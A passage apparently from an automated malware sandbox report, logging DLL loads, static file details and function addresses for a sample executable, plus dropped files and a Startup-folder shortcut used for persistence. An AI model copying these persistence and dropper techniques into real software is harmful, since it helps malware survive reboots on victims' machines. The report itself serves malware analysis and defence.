Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: T6l6gPxwQU.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: T6l6gPxwQU.exeStatic file information: File size 1974272 > 1048576
Source: T6l6gPxwQU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T6l6gPxwQU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T6l6gPxwQU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T6l6gPxwQU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T6l6gPxwQU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T6l6gPxwQU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: T6l6gPxwQU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: T6l6gPxwQU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T6l6gPxwQU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T6l6gPxwQU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T6l6gPxwQU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T6l6gPxwQU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T6l6gPxwQU.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1932F4 LoadLibraryA,GetProcAddress,0_2_00007FF6BB1932F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB157399 push rdi; ret 0_2_00007FF6BB1573A2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1578FD push rdi; ret 0_2_00007FF6BB157904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E4300 push eax; ret 1_2_00007FFD9B7E430D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055E93F push edi; ret 3_2_0055E941
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055EA58 push esi; ret 3_2_0055EA5A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00598A4A push FFFFFF8Bh; iretd 3_2_00598A4C
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00558B75 push ecx; ret 3_2_00558B88
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0054CBF1 push eax; retf 3_2_0054CBF8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055EC33 push esi; ret 3_2_0055EC35
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0055ED1C push edi; ret 3_2_0055ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CE93F push edi; ret 10_2_008CE941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CEA58 push esi; ret 10_2_008CEA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00908A4A push FFFFFF8Bh; iretd 10_2_00908A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008BCBF1 push eax; retf 10_2_008BCBF8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008C8B75 push ecx; ret 10_2_008C8B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CEC33 push esi; ret 10_2_008CEC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008CED1C push edi; ret 10_2_008CED1E

Persistence and Installation Behavior

barindex
Source: C:\Users\Public\InformationCheck.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Users\Public\InformationCheck.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeFile created: C:\Users\Public\InformationCheck.exeJump to dropped file
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeFile created: C:\Users\Public\InformationCheck.exeJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeFile created: C:\Users\Public\InformationCheck.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB144514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF6BB144514
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_005B59B3
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00545EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00545EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_009259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_009259B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_008B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_008B5EDA
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_005533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_005533B7
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
